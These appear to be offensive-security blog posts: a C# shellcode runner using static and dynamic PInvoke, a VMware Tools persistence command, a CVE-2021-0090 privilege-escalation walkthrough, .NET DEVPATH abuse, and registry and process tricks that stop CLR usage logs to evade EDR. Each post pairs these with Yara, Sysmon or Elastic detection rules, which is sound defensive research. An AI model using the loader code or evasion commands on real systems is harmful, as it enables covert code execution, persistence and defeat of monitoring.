  • For clarity, “Dynamic Pinvoke” in the context of this blog is not directly related to the incredible DInvoke (D/Invoke) project by TheWover and FuzzySec (although referenced in this blog post). DInvoke is an API for dynamically calling the Windows API, using syscalls, and evading endpoint security controls through powerful primitives and other advanced features such as module overloading and manual mapping.

Classic PInvoke Usage & Implications

Platform Invoke, also known as PInvoke, is a well-supported .NET technology for accessing unmanaged code in managed coding languages. If you have previously explored .NET managed-to-unmanaged interop code, you are likely very family with PInvoke methods and structures from the System.Runtime.InteropServices namespace. In offensive operations, a simple C-Sharp (C#) shellcode runner program with PInvoke signatures for native libraries and exported functions may look something like this:


using System;
using System.Runtime.InteropServices;

namespace ShellcodeLoader
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] x64shellcode = new byte[294] {
            0xfc,0x48, ... };

            IntPtr funcAddr = VirtualAlloc(
                              IntPtr.Zero,
                              (ulong)x64shellcode.Length,
                              (uint)StateEnum.MEM_COMMIT, 
                              (uint)Protection.PAGE_EXECUTE_READWRITE);
            Marshal.Copy(x64shellcode, 0, (IntPtr)(funcAddr), x64shellcode.Length);

            IntPtr hThread = IntPtr.Zero;
            uint threadId = 0;
            IntPtr pinfo = IntPtr.Zero;

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        #region pinvokes
        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(
            IntPtr lpStartAddr,
            ulong size, 
            uint flAllocationType, 
            uint flProtect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(
            uint lpThreadAttributes,
            uint dwStackSize,
            IntPtr lpStartAddress,
            IntPtr param,
            uint dwCreationFlags,
            ref uint lpThreadId);

        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(
            IntPtr hHandle,
            uint dwMilliseconds);

        public enum StateEnum
        {
            MEM_COMMIT = 0x1000,
            MEM_RESERVE = 0x2000,
            MEM_FREE = 0x10000
        }

        public enum Protection
        {
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
        }
        #endregion
    }
}
– GitHub Gist: https://gist.github.com/matterpreter/03e2bd3cf8b26d57044f3b494e73bbea
– Credit: @matterpreter (from this great post on Offensive PInvoke) and @Arno0x0x (for the shellcode)

When the managed code is compiled to a .NET Portable Executable (PE), the C# source is actually compiled to an intermediate language (MSIL) bytecode and passed to the Common Language Runtime (CLR) to facilitate execution. The composition of a .NET executable follows the standard PE/COFF format, so it will include the expected structures and headers like a native PE but with additional CLR header and data sections. However, if we analyze a .NET PE using a tool like pestudio and view the imports, we will notice there is only one entry called _CorExeMain:

We may have expected to see the Kernel32 exported methods from the shellcode runner, but these entries are not stored in the PE’s Import Lookup Table or Import Address Table (IAT). Rather, we can find PInvoke methods under the ImplMap table in the CLR metadata. Using the monodis program, we can quickly dump the contents of ImplMap that includes some extra metadata:

To review actual PInvoke signatures from the PE, MSIL can be easily reversed back to managed code (verbatim) and analyzed with programs like dnSpy and ILSpy:

So, what exactly are the implications of using classic PInvoke from an offensive security perspective? For starters, a collection of revealed PInvoke definitions within the code may be viewed as an indicator of suspiciousness through simple manual analysis since PInvoke signatures cannot be easily obfuscated or adjusted. Furthermore, the following pitfalls of using PInvoke definitions are described in the Emulating Covert Operations – Dynamic Invocation blog by TheWover:

  • Static PInvoke definitions of Windows API calls will be included as an entry within the .NET assembly’s Import Address Table (IAT) when loaded, which could be easily scrutinized by automated tools (e.g. sandboxes).
  • PInvoke definitions are subject to monitoring by security tools that can detect ‘suspicious’ API calls (e.g. from EDR hooks).

So, how could this potentially be improved? Let’s take a look at Dynamic PInvoke.

Dynamic PInvoke Usage & Implications

Dynamic types and objects in .NET are quite interesting and very powerful. According to this Microsoft Doc, dynamic objects “expose members such as properties and methods at run time, instead of at compile time. This enables you to create objects to work with structures that do not match a static type or format.” By leveraging the System.Reflection.Emit namespace, dynamic assemblies can be created in a dynamic object and ultimately executed at runtime.

For background, you may already be familiar with the System.Reflection namespace that contains classes and types for retrieving and accessing data from .NET components such as assemblies, modules, members, metadata, etc. Through reflection, .NET methods can also be invoked, which is quite popular in offensive operations and for in-memory tradecraft. System.Reflection.Emit allows us to take this a step further for defining the objects and methods that we ultimately want to invoke using builder classes, modules, types, and methods. Now, let’s get to the substance of the post and talk about the very interesting typebuilder method – DefinePInvokeMethod().

In the previous section, a PInvoke method signature structure appeared as follows:

[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(
    IntPtr lpStartAddr,
    ulong size, 
    uint flAllocationType, 
    uint flProtect);

For dynamic invocation, the PInvoke signatures must be instrumented in a way to be compatible with DefinePInvokeMethod(). As such, our next example will leverage the same shellcode execution technique and Kernel32 exports, but we will prepare a function that handles the builder logic and implement our own functions that map to each required Kernel32 calls to keep the code simple and easy to follow.

The builder logic function (called DynamicPInvokeBuilder() in our example) creates a dynamic assembly to execute in the default appdomain. In the function, DefinePInvokeMethod() is called with our target Kernel32 export along with method attributes, arguments, and parameter types.

The code functions are relatively straight forward. We will simply retain the names of the Kernel32 exports for our example, but this is not required. Each function effectively calls DynamicPInvokeBuilder() with object arrays that map to the respective arguments, parameter types, and the return method type.

Our modified managed shellcode runner appears as follows:

using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;

namespace ShellcodeLoader
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] x64shellcode = new byte[294] {0xfc,0x48, ... };

        IntPtr funcAddr = VirtualAlloc(
                              IntPtr.Zero,
                              (uint)x64shellcode.Length,
                              (uint)StateEnum.MEM_COMMIT,
                              (uint)Protection.PAGE_EXECUTE_READWRITE);
            Marshal.Copy(x64shellcode, 0, (IntPtr)(funcAddr), x64shellcode.Length);

            IntPtr hThread = IntPtr.Zero;
            uint threadId = 0;
            IntPtr pinfo = IntPtr.Zero;

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        public static object DynamicPInvokeBuilder(Type type, string library, string method, Object[] args, Type[] paramTypes)
        {
            AssemblyName assemblyName = new AssemblyName("Temp01");
            AssemblyBuilder assemblyBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(assemblyName, AssemblyBuilderAccess.Run);
            ModuleBuilder moduleBuilder = assemblyBuilder.DefineDynamicModule("Temp02");

            MethodBuilder methodBuilder = moduleBuilder.DefinePInvokeMethod(method, library, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, type, paramTypes, CallingConvention.Winapi, CharSet.Ansi);

            methodBuilder.SetImplementationFlags(methodBuilder.GetMethodImplementationFlags() | MethodImplAttributes.PreserveSig);
            moduleBuilder.CreateGlobalFunctions();

            MethodInfo dynamicMethod = moduleBuilder.GetMethod(method);
            object res = dynamicMethod.Invoke(null, args);
            return res;
        }

        public static IntPtr VirtualAlloc(IntPtr lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect)
        {
            Type[] paramTypes = { typeof(IntPtr), typeof(UInt32), typeof(UInt32), typeof(UInt32) };
            Object[] args = { lpAddress, dwSize, flAllocationType, flProtect };
            object res = DynamicPInvokeBuilder(typeof(IntPtr), "Kernel32.dll", "VirtualAlloc", args, paramTypes);
            return (IntPtr)res;
        }

        public static IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, ref UInt32 lpThreadId)
        {
            Type[] paramTypes = { typeof(UInt32), typeof(UInt32), typeof(IntPtr), typeof(IntPtr), typeof(UInt32), typeof(UInt32).MakeByRefType() };
            Object[] args = { lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId };
            object res = DynamicPInvokeBuilder(typeof(IntPtr), "Kernel32.dll", "CreateThread", args, paramTypes);
            return (IntPtr)res;
        }

        public static Int32 WaitForSingleObject(IntPtr Handle, UInt32 Wait)
        {
            Type[] paramTypes = { typeof(IntPtr), typeof(UInt32) };
            Object[] args = { Handle, Wait };
            object res = DynamicPInvokeBuilder(typeof(Int32), "Kernel32.dll", "WaitForSingleObject", args, paramTypes);
            return (Int32)res;
        }

        public enum StateEnum
        {
            MEM_COMMIT = 0x1000,
            MEM_RESERVE = 0x2000,
            MEM_FREE = 0x10000
        }

        public enum Protection
        {
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
        }
    }
}
– GitHub Gist: https://gist.github.com/bohops/4f98002ecfa85e173e8b4873690663f5
– Useful Reference: https://www.codeproject.com/Articles/9214/Dynamic-Invoke-from-Unmanaged-DLL

Once the PE compiled and executed, the shellcode is launched:

Now, let’s take a look at a few observables to compare against classic PInvoke. First, the ImplMap table in the CLR metadata (captured by monodis) is no longer populated like it was in the previous section:

In dnSpy, we can clearly see the source code from the reversed MSIL. However, there are opportunities for further obfuscation and enhancement if desired:

Overall, dynamic invocation was a success! Let’s take a look at a few defensive opportunities….

Defensive Observables & Considerations

.NET Introspection: In this implementation, a dynamic assembly module is created for each PInvoke definition (which could be improved). This could be considered anomalous behavior, especially for repeatably or randomly named assemblies.

EDRs and analysis tools (e.g. ProcessHacker) that have .NET introspection (e.g. via hooking or ETW) should be able to capture anomalous in-memory assembly loads (especially those without a disk-backing).

Malware Analysis: Based on personal observation, I have not seen much out there with regard to offensive use of DefinePInvokeMethod with the exception of some PowerShell tooling. As such, it may be compelling to leverage this opportunity to search for the method string as a part of static or sandbox analysis.

This simple Yara rule may be useful as a starting point for discovery:

rule Find_Dynamic_PInvoke
{

    meta:
        description = "Locate use of the DefinePInvokeMethod typebuilder method in .NET binaries or managed code."

    strings:
        $method= "DefinePInvokeMethod"

    condition:
        $method
}

Conclusion

As you can see, dynamic types, objects, and invocation are very powerful in .NET. There is way more opportunity to explore in this area such as working directly with MSIL using the ILGenerator class to define methods, enhancing the example DynamicPInvokeBuilder() method to support more interesting native functions, or leveraging other dynamic techniques to invoke native code (e.g. with function delegates).

As always, thank you for taking the time to read this post. I hope you found it useful.

~ bohops

Analyzing and Detecting a VMTools Persistence Technique

Introduction

It is always fun to reexplore previously discovered techniques or pick back on old research that was put on the wayside in hopes to maybe finding something new or different. Recently, I stood up an ESXi server at home and decided to take a quick peak at the VMware directory structure after installing the VMware Tools (vmtools) package in a Windows 10 Virtual Machine.

Among the directory contents were some batch files that I forgot about and the very interesting binary – VMwareToolBoxCmd.exe. After some quick Googling, it did not take take long to land on Adam’s (@Hexacorn) incredible blog to find these two very informative post about VMwareToolBoxCmd.exe, OS fingerprinting, and a privileged persistence technique with VMware Tools:

In this quick post, we will analyze this persistence technique and discuss a few strategies for detecting potential abuse.

The Technique

As Adam describes, VMwareToolBoxCmd.exe is a utility command for capturing VM information or changing the configuration of various and sundry virtual machine settings. One feature is to control batch scripts that can be configured to run based on VM state operations including power (power on), shutdown (power off), resume (from suspended state), and and suspend (entering suspended stated) as noted in the command utilities script help subcommand:

There are several built-in batch scripts in the VMware Tools directory, but this does not preclude someone from using and enabling a custom script. For example, the following command script can be used to specify the execution of a custom script when the VM is powered on:

VMwareToolboxCmd.exe script power set "c:\evil\evilscript.bat"
VMwareToolboxCmd.exe script power enable

The command sequence itself is not as interesting as what it actually does. In the following Sysmon screenshot, we can see that content is actually written to the tools.conf file in \ProgramData:

Upon further inspection, the contents of this file appear as follows:

Coincidently, there is another operation for resume under the powerops section directive. This was added previously by me to show that 1) batch files are not the only thing that can be configured and 2) the tools.conf file is the key component what enables the script execution functionality.

Note: For a complete example of what a configuration file may look like, take a look at tools.conf.example in the same \ProgramData directory or this sample file in VMware’s open-vm-tools repository.

After a quick shutdown and power-on, we can see our batch file payload (notepad.exe) is executed by cmd.exe as a child process of vmtoolsd.exe under the context of NT AUTHORITY\SYSTEM:

Defensive Considerations

Consider the following detection opportunities:

Sysmon

For event collection with Sysmon, consider monitoring tools.conf write (modification) events with an experimental rule. The following rule can be added to @SwiftOnSecurity‘s Sysmon-Config under the EVENT 11: “File created” section or under @olafhartong‘s Sysmon-Modular “11_file_create” rules:

<TargetFilename>C:\ProgramData\VMware\VMware Tools\tools.conf</TargetFilename>

Elastic Security

I’ve been digging into the Elastic Stack in recent months and felt that it would be a great opportunity to build a simple rule in Elastic Security. Conveniently, Elastic was kind enough to implement a rule creation wizard. Leverage this by selecting Elastic Security in Kibana, navigating to “Rules”, then selecting “Create New Rule”:

I created this ‘custom’ rule based on the Event Query Language (EQL) of another rule [License: Elastic License v2]:

file where event.type != "deletion" and
file.path :
(
"C:\ProgramData\VMware\VMware Tools\tools.conf"
)

After walking through the wizard and enabling the rule, I modified the tools.conf file which triggered this alert:

Of note, the community can contribute to Elastic’s open-source Detection Rules repository. There is a set of instructions to leverage a Python utility to help with the creation and validation process (outlined here).

Other Detection Opportunities

*Environment: In some environments, it is very plausable that operational power scripts/commands may already be enabled for legitimate reasons. If such is the case, audit the tools.conf file for target scripts and monitor accordingly. Although custom scripts can be specified, the following (default) operational state scripts are included with VMware Tools (in the \VMware Tools directory) and may be worth monitoring:

  • poweroff-vm-default.bat
  • poweron-vm-default.bat
  • resume-vm-default.bat
  • suspend-vm-default.bat

*Hunt: As shown in a previous screenshot, the parent process for the launched process is vmtoolsd.exe. Consider monitoring or hunting for suspicious child processes. Additionally, monitoring for VMwareToolBoxCmd.exe command usage could be opportunistic in some environments.

Conclusion

As always, thank you for taking the time to read this post.

~ bohops

CVE-2021-0090: Intel Driver & Support Assistant (DSA) Elevation of Privilege (EoP)

TL;DR

Intel Driver & Support Assistant (DSA) is a driver and software update utility for Intel components. DSA version 20.8.30.6 (and likely prior) is vulnerable to a local privilege escalation reparse point bug. An unprivileged user has nominal control over configuration settings within the web-based interface.  This includes the ability to configure the folder location for downloads and data (e.g. installers and log files). An unprivileged user can change the folder location, coerce a privileged file copy operation to a “protected” directory through a reparse point, and deliver a payload such as a DLL loading technique to execute unintended code.

Of note, a similar bug in DSA (CVE-2019-11114) was previously discovered by Rich Warren of the NCC Group. This technical advisory provides an excellent overview of that bug as well as operational details of DSA.

Walkthrough

The following walkthrough represents a simple methodology for discovering and exploiting the EoP bug in an unprivileged user context:

1 – The user selects the DSA tray icon on the Windows Task Bar:

2 – The DSA interface opens in the default web browser:

3 – Selecting the Settings link (on the left) opens up the DSA Settings page. The unprivileged user has the ability to change the Folder Location (Default in this case is C:\ProgramData\Intel\DSA):

4 – Taking note of the default folder path, the DACL entries of that path reveal that the Authenticated Users group has Full Control permissions over the directory:

5 – In the DSA directory, the folder structure contains the data, downloads, and logs.  The structure appears as follows:

6 – In the DSA Settings page, the unprivileged user can change the directory by selecting the Change Location button under Folder Location. This browsing dialogue box is prompted:

7 – After changing the folder directory, the folder structure and contents under the previous Folder Location are moved to the new folder by the DSA service (DSAService.exe). For demonstration, a test file (test.txt) is created within the folder directory structure at c:\test\Downloads\test.txt.  In the following screenshot, ProcMon shows the ‘move’ activity from the previous directory structure (c:\test) to the new directory structure (c:\temp) when the Folder Location is changed.  This includes the text.txt file to c:\temp\Downloads\test.txt:

8 – Of course, this sets up an interesting test case for identifying a potential reparse point logic bug. In this case, a folder junction mount point is set on the previous DSA Folder Location directory structure (c:\test\downloads) and targeted for the protected c:\windows\system32 directory.  The tool used is create the folder junction is CreateMountPoint by James Forshaw of Google Project Zero.

Note: an unprivileged user could leverage other tools to create junctions such as the New-Path PowerShell cmdlet.

9 – For exploitation, a custom Dynamic Link Library (DLL) is planted in the current DSA Folder Location directory structure at c:\temp\downloads\ulapi.dll.  In this case, ualapi.dll is specifically chosen because this DLL will load at system start time (e.g. after a reboot) by the Windows Spooler service. The legitimate DLL is not present on Windows 10. 

10 – After setting up the folder junction and staging ualpi.dll, the Folder Location is changed within the DSA Settings. The action causes the DSA service to ‘move’ ualpi.dll to c:\windows\system32:

11 – After a reboot, ualapi.dll is loaded by the Print Spooler to execute a payload as NT AUTHORITY\SYSTEM. In this case, the DLL spawns cmd.exe and subsequently notepad.exe:

Exploiting this in a programmatic fashion is an exercise for the reader 😉

Defensive Considerations

  • Organizations & Home Users: Update to the latest version of Intel Driver & Support Assistant (DSA). As of the draft of this post, the latest version is 21.4.29.8.
  • Vendor(s): In Microsoft’s Bug Bounty program details, Microsoft claims that “broad mitigations” will be applied to the reparse point bug class “in the future”. To date, Microsoft no longer offers Bug Bounty rewards for this class of bug. Until “broad mitigations” are applied to address this operating system wide (i.e. like Hard Links in Win10 1809?), Microsoft and 3rd party vendors will likely have to continue to address these symlink issues on an individual basis.

Conclusion

Intel was notified of this bug bug in Sept 2020 and a patch was issued in June 2021.

Thank you for taking the time to read this post.

~ bohops

Abusing and Detecting LOLBIN Usage of .NET Development Mode Features

Background

As discussed in this previous post, Microsoft has provided valuable (explicit and implicit) insight into the inner workings of the functional components of the .NET ecosystem through online documentation and by open-sourcing .NET Core. .NET, in general, is a very powerful and capable development platform and runtime framework for building and running .NET managed applications. A powerful feature of .NET (on Windows in particular), is the ability to adjust the configuration and behavior of the .NET Common Language Runtime (CLR) for development and/or debugging purposes. This is achievable through various configuration interfaces such as environment variables, registry settings, and configuration files/property settings.

From an attacker’s perspective, configuration adjustments provide interesting opportunities for living-off-the-land-binary (lolbin) execution. In this short post, we’ll highlight a technique for turning pretty much any .NET executable into an opportunistic lolbin that abuses .NET development features by overriding Global Assembly Cache (GAC) path lookups. Furthermore, we’ll examine several defensive considerations for detecting malicious use of the presented technique.

The General Technique

Manipulating .NET development features to override the GAC is actually quite simple. As summarized from this Microsoft Doc, the following is required:

  • Configuration File – An element called developmentMode must be specified and set to true in the application configuration file (e.g. app.config) or the machine configuration file. Note: The machine configuration file (machine.config) has system-wide scope and requires administrator-level privileges for modification. Application configuration files can be created and/or modified at an unprivileged level (e.g. as placed in a writable directory along with a sacrificial/target assembly). An example assembly configuration appears as follows with the developmentMode element:
Source: Microsoft Docs
  • Environment Variable – An environment variable called DEVPATH must be set with a value that points to a file system directory path. When set, the CLR attempts to ‘resolve’ the target assembly dependencies in the path before locating the ‘unfound’ assemblies in the GAC (which is the default behavior).

Let’s take a look at two loading behavior examples when executing UevAppMonitor.exe, a .NET application natively located in System32…

Example 1: Normal Execution

When executed under normal conditions, the UevAppMonitor.exe application will load dependencies, including unmanaged libraries out of System32, the CLR components, and referenced managed libraries from the GAC directories as noted in the following ProcMon screenshot.

Example 2: Modified Execution

Interestingly, UevAppMonitor.exe actually has an application configuration filed located in the System32 directory:

For simplicity and to demonstrate the loading behavior, UevAppMonitor.exe and UevAppMonitor.exe.config are copied to a temporary directory, and UevAppMonitor.exe.config is modified with the required developmentMode element (as noted above):

Next, The DEVPATH environment variable is set to point to a desired load directory. As described in this post, there are several ways to create/inject an environment variable. In this case, the DEVPATH variable is assigned (temporarily) within the shell to point to the non-existent “c:\zzz” path for chosen effect:



When running UevAppMonitor.exe in the temporary directory that contains the UevAppMonitor.exe.config file, the CLR attempts to locate the assembly references in “C:\zzz” before properly resolving them in the GAC folders (since a reference is not found):

As a result, managed binaries can be used for a number of use cases with control over the directory lookup path. This includes but is not limited to the possibility of application control bypass with managed assembly modification (depending on the solution), general DLL hijack/sideloading, and persistence. Further exploration of these particular offensive use cases is an exercise for the reader.

Defensive Considerations

Consider these defensive opportunities for detection:

Monitor (and Hunt for) Application Configuration Files: There are numerous EXE/DLL app.config files located on the Windows Operating system to control .NET functionality including .NET managed binaries and unmanaged binaries that leverage managed components. Many of these .config files are Windows or Microsoft signed. Modification of existing .config files (e.g. system.config) and/or creation of new configuration files in another directory location should be a red flag. Furthermore, the developmentMode element in any app.config should be scrutinized (with very few exceptions such as development environments). This element should not appear legitimately in a production/working environment (unless introduced by accident).

Add this experimental Sysmon rule to @SwiftOnSecurity‘s Sysmon-Config under the EVENT 11: “File created” section or under @olafhartong‘s Sysmon-Modular “11_file_create” rules for detecting .config file creation (+ modification) events:

<TargetFilename condition="end with">.config</TargetFilename>

Monitor for DEVPATH Environment Variable Creation Events: Temporary environment variable usage is likely difficult to detect, but for permanent additions (e.g. for actor persistence), the following experimental Sysmon rule can be added to Sysmon-Config under the “SYSMON EVENT ID 12 & 13 & 14 : REGISTRY MODIFICATION” section or under the Sysmon-Modular “12_13_14_registry_event” rules to detect the addition of the DEVPATH variable:

<TargetObject condition="end with">\Environment\DEVPATH</TargetObject>

Leverage Application Control Audit Features: Application Control is not just a prevention mechanism. Leverage audit mode features of application control solutions to enhance detection telemetry (e.g. for detecting unsigned DLL loads that would have been prevented) without block rules. For AppLocker, the event log is located at:  Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> AppLocker. For WDAC, the log is located at: Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> Code Integrity -> Operational. 3rd party security solutions may log events to another location.

Related Research

If interested, check out research from others that have discovered interesting ways to leverage .NET configuration features (e.g. CLR Configuration Knobs) for different use cases:

Conclusion

Thank you for taking the time to read this post!

-bohops

Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion

Introduction

In recent years, there have been numerous published techniques for evading endpoint security solutions and sources such as A/V, EDR and logging facilities. The methods deployed to achieve the desired result usually differ in sophistication and implementation, however, effectiveness is usually the end goal (of course, with thoughtful consideration of potential tradeoffs). Defenders can leverage the native facilities of the operating system and support frameworks to build quality detections. One way to detect potentially interesting .NET behavior is by monitoring the Common Language Runtime (CLR) Usage Logs (“UsageLogs”) for .NET execution events.

In this quick post, we will identify how defenders are (likely) leveraging .NET Usage Logs for detection and forensic response, investigate ways to circumvent detection log monitoring, and discuss potential monitoring opportunities for catching Usage Log tampering behavior.

Using .NET CLR Usage Logs to Detect Suspicious Activity

When .NET applications are executed or when assemblies are injected into another process memory space (by the Red Team), the .NET Runtime is loaded to facilitate execution of the assembly code and to handle various and sundry .NET management tasks. One task, as initiated by the CLR (crl.dll), is to create a Usage Log file named after the executing process once the assembly is finished executing for the first time in the (user) session context. This log file contains .NET assembly module data, and its purpose serves an information file for .NET native image autogeneration (auto-NGEN).

Prior to process exit, the CLR typically writes to one of these file paths (although there could be others):

  • <SystemDrive>:\Users\<user>\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs
  • <SystemDrive>:\Windows\<System32|SysWOW6$=4>\config\systemprofile\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs

As an example, we can see that the powershell.exe.log Usage Log is created for the first time just prior to ‘gracefully’ terminating the powershell.exe process:

From a DFIR and threat hunting perspective, analyzing the Usage Logs is very opportunistic for investigatory purposes as outlined in this excellent blog post by the MENASEC Applied Research Team. From an endpoint monitoring standpoint, Endpoint Detection & Response Solutions (‘EDRs’) are likely monitoring Usage Log file creation events to identify suspicious or unlikely processes that have loaded the .NET CLR. As an example, Olaf Hartong (@olafhartong) maintains the incredible Sysmon-Modular project and has graciously provided a rule config that monitors Usage Log activity for .NET 2.0 activity and risky LOLBINs. Red Teamers can certainly expect that many commercial vendors are monitoring Usage Logs in a similar fashion (e.g. to catch Cobalt Strike’s execute-assembly).

Before diving into the evasive techniques, let’s briefly discuss Configuration Knobs in .NET…

A Quick Primer on .NET CLR Configuration Knobs

While maintaining a wealth of valuable documentation for .NET Framework and subsequently releasing open-source .NET Core, Microsoft has provided valuable (explicit and implicit) insight into the inner workings of the functional components of the .NET ecosystem. .NET, in general, is a very powerful and capable development platform and runtime framework for building and running .NET managed applications. A powerful feature of .NET (on Windows in particular), is the ability to adjust the configuration and behavior of the .NET Common Language Runtime (CLR) for development and/or debugging purposes. This is achievable through .NET CLR Configuration Knobs controlled by environment variables, registry settings, and/or configuration files/property settings as retrieved by the CLRConfig.

Abusing configuration knobs is not a new concept. Other researchers have explored various techniques for leveraging knob settings to execute arbitrary code and/or evade defensive controls. A few recent examples include Adam Chester’s (@_xpn_) use of the ETWEnabled CLR configuration knob to disable Event Tracing for Windows (ETW) and Paul Laîné’s (@am0nsec) use of the GCName CLR configuration knob to specify a custom Garbage Collector (DLL) for loading arbitrary code and bypassing application control solutions. And of course, Casey Smith (@subTee) for exploring all things .NET including COR_PROFILER unmanaged code loading for defense evasion/UAC bypass and the Ghost Loader AppDomainManager injection technique (as further described by @netbiosX).

Adjusting .NET Configuration Knob Registry Settings To Evade CLR Usage Log File Creation

Interestingly, .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. The NGenAssemblyUsageLog CLR configuration knob string value can be set at the following Registry keys:

  • HKCU\SOFTWARE\Microsoft\.NETFramework
  • HKLM\SOFTWARE\Microsoft\.NETFramework

Configuring the value within the HKCU hive will apply for the active user context and influence logs output that would otherwise log to: <SystemDrive>:\Users\<user>\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs directory and/or Microsoft Office Hub paths. Configuring the value within the HKLM hive will apply for the system context and influce logs output that would otherwise log to: <SystemDrive>:\Windows\<System32|SysWOW64>\config\systemprofile\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs directory paths. Let’s walk through a simple example to demonstrate expected and tampered behavior…

The following source code is compiled as a 64-bit NET application called ‘test.exe’:

Before executing the application, take note that the UsageLogs directory is empty on this test machine. The directory may be well populated on production or test machines.

Once executed, a simple message box appears:

Upon inspecting the UsageLogs directory, a file named test.exe.log is created that contains assembly module information:

Next, let’s remove the test.exe.log file from the UsageLogs directory to demonstrate tampering behavior:

Before re-executing the .NET application, let’s validate the existence of the .NETFramework registry (sub)key in HKCU with the following command:

reg query "HKCU\SOFTWARE\Microsoft\.NETFramework"

In this case, the Registry key exists and does not contain additional values or subkeys. (Note: If the .NETFramework key does not exist, it can be created). Next, add the NGenAssemblyUsageLog configuration knob string value to the .NETFramework key and verify the change:

reg.exe add "HKCU\SOFTWARE\Microsoft\.NETFramework" /f /t REG_SZ /v "NGenAssemblyUsageLog" /d "NothingToSeeHere"

The program is executed again:

And as expected, the text.exe.log file does not appear after viewing the contents of the target UsageLogs directory:

So you may be asking – what does the CLR do when you supply the NGenAssemblyUsageLog name an arbitrary value? Well, it really just inserts the arbitrary string into a ‘properly’ constructed path. For instance, if we set the path data to ‘eeeee’ and execute a .NET application, the CLR inserts the string value into the constructed path::

Since the path is not found, the Usage Log does not write to disk. As shown in the following screenshot, the partial UsageLogs path suffix is hardcoded and pulled from clr.dll:

Adjusting .NET Configuration Knob Environment Variables To Evade CLR Usage Log File Creation

CLR configuration knobs are also configured by setting environment variables with the the COMPlus_ prefix. In the following example, the COMPlus_NGenAssemblyUsageLog is set to an arbitrary value (e.g. ‘zzzz’) in the Command Prompt. When PowerShell (a .NET application) is invoked, the COMPlus_NGenAssemblyUsageLog environment variable is inherited from the parent cmd.exe process:

After exiting PowerShell, we note that the Usage Log file (powershell.exe.log) is never created in the UsageLogs directory:

When Adam Chester (@_xpn_) blogged about the ETWEnabled .NET CLR knob configuration discovery for disabling ETW processing, he published a spoofing proof-of-concept to inject the COMPlus_ETWEnabled environment variable when launching a child process. After modifying a few variables in the program, the same spoofing technique can be used to disable the Usage Log output as shown in this code snippet:

After compiling and executing the program, PowerShell.exe is launched with the COMPlus_NGenAssemblyUsageLog environment variable set to an arbitrary value of “zz”:

And as expected, the Usage Log is never created after exiting the PowerShell session:

Note: the modified environment variable spoofing POC can be found here.

Disrupting the CLR Usage Log Output Operation via Forceful Process Termination

.NET Configuration Knobs provide an elegant way to influence log flow. However, there are methods for disrupting the Usage Log creation process without having to make configuration changes. These methods pose greater risk for disrupting process and program workflow.

Usage Logs are generated when a process exits ‘gracefully’. This occurs when an assembly completes the execution process, such as when using an implicit or explicit return statement or when using the Environment.Exit() method in (C#) managed code:

However, if the process is forced to terminate, the Usage Log process is disrupted and never written to disk. As an example, the Process.Kill() method can be used to achieve the desired result (at the risk of losing data or a shell):

Disrupting the CLR Usage Log Output Operation via Module Unloading

In another other interesting albeit risky testing scenario, tampering with loaded modules (DLLs) can be used to disrupt CLR Usage Log creation by destabilizing the process and causing it to prematurely exit. To accomplish this, we leverage .NET delegate function pointers and the powerful DInvoke library authored by The Wover (@TheRealWover) and b33f (@FuzzySec). For the test case, a delegate function pointer is declared for the FreeLibrary() Win32 API function which is called to unload modules from the running .NET managed process. Removing a single module or a lesser combinations of modules could potentially achieve the same effect, however, we will unload several .NET modules to increase the chances of making the process unstable to force termination and disrupt Usage Log creation (Note: We are picking on .NET modules here but other DLLs could be unloaded as well)

To successfully unload a module, we must first get a pointer to the library address of the FreeLibrary() function with DInvoke’s GetLibraryAddress(). Then, we convert the function pointer to a callable delegate for the FreeLibrary() API method with the GetDelegateForFunctionPointer() method from .NET ‘Interop’ services. Next, we get a handle on each of the the loaded modules (DLLs) by searching for each module’s base address reference in the Process Execution Block (PEB) of our .NET process with DInvoke’s GetPebLdrModuleEntry() method. Lastly, we call the FreeLibrary delegate function with the handle to each module to unload it from memory. The POC code in this test case is appears as follows:

After compiling and executing the code, the Usage Log file creation process is disrupted (as expected):

For more information about DInvoke, check out this fantastic blog post by The Wover (@TheRealWover) and b33f (@FuzzySec). The POC code for unloading DLL modules can be found here.

Defensive Considerations

Continue to monitor Usage Logs files & directories. Implement analytics/signatures/detections for Usage Log creation and modification. Despite the questionable offensive techniques demonstrated here, such detections are still quite valuable. Offensive operators will not always account for Usage Log tampering while executing their .NET tools.

